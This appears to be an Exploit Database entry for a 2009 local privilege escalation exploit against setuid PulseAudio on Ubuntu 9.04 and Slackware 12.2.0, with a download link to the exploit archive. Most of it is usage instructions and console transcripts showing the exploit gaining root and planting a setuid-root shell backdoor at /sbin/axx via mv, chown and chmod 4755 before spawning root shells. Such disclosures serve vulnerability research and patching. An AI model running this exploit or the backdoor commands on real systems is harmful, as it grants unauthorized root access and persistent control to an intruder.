PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

EDB-ID:

9208


Author:

anonymous

Type:

local


Platform:

Linux

Date:

2009-07-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and 
Yorick Koster 
--

Put files in /tmp/pulseaudio-exp (or change config.h). Must be on 
same fs as the pulseaudio binary.

Goes faster if you already have a pulseaudio running ? :p

Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 
(x86)

Ubuntu:
------------------------------------
$ ./c.sh
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root) 
groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm
in),122(sambashare)
# uname -a
Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 
UTC 2009 x86_64 GNU/Linux
------------------------------------
Slackware
------------------------------------
$ ./c.sh 
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
sh-3.1# id
uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt)
sh-3.1# uname -a
Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 
i686 Intel(R) Pentium(R) Dual  CPU  T3400  @ 2.16GHz 
GenuineIntel GNU/Linux
------------------------------------

download:  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)

# milw0rm.com [2009-07-20]